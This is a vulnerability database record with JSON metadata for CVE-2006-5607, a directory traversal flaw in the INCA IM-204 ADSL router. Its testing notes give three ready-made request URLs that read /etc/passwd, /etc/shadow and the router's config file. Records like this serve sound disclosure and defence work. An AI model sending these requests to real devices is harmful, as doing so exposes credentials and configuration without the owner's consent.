ID OSVDB:30076
Type osvdb
Reporter OSVDB
Modified 2006-10-23T05:49:02
Description
Manual Testing Notes
http://[target]/cgi-bin/webcm?getpage=/./././././././etc/passwd
http://[target]/cgi-bin/webcm?getpage=/./././././././etc/shadow
http://[target]/cgi-bin/webcm?getpage=/./././././././etc/config.xml
References:
Secunia Advisory ID:22557
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0390.html
ISS X-Force ID: 29815
FrSIRT Advisory: ADV-2006-4223
CVE-2006-5607
Bugtraq ID: 20696
{"enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2017-04-28T13:20:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5607"]}], "modified": "2017-04-28T13:20:26", "rev": 2}, "vulnersScore": 6.1}, "bulletinFamily": "software", "affectedSoftware": [], "references": [], "href": "https://vulners.com/osvdb/OSVDB:30076", "id": "OSVDB:30076", "title": "INCA IM-204 webcm getpage Traversal Arbitrary File Access", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "lastseen": "2017-04-28T13:20:26", "edition": 1, "reporter": "OSVDB", "description": "## Manual Testing Notes\nhttp://[target]/cgi-bin/webcm?getpage=/./././././././etc/passwd\nhttp://[target]/cgi-bin/webcm?getpage=/./././././././etc/shadow\nhttp://[target]/cgi-bin/webcm?getpage=/./././././././etc/config.xml\n## References:\n[Secunia Advisory ID:22557](https://secuniaresearch.flexerasoftware.com/advisories/22557/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0390.html\nISS X-Force ID: 29815\nFrSIRT Advisory: ADV-2006-4223\n[CVE-2006-5607](https://vulners.com/cve/CVE-2006-5607)\nBugtraq ID: 20696\n", "modified": "2006-10-23T05:49:02", "viewCount": 2, "published": "2006-10-23T05:49:02", "cvelist": ["CVE-2006-5607"]}
{"cve": [{"lastseen": "2020-10-03T11:48:19", "description": "Directory traversal vulnerability in /cgi-bin/webcm in INCA IM-204 allows remote attackers to read arbitrary files via a \"/./.\" (modified dot dot) sequences in the getpage parameter.", "edition": 3, "cvss3": {}, "published": "2006-10-30T23:07:00", "title": "CVE-2006-5607", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5607"], "modified": "2018-10-17T21:43:00", "cpe": ["cpe:/h:inca:im-204_adsl_router:*"], "id": "CVE-2006-5607", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5607", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:h:inca:im-204_adsl_router:*:*:*:*:*:*:*:*"]}]}
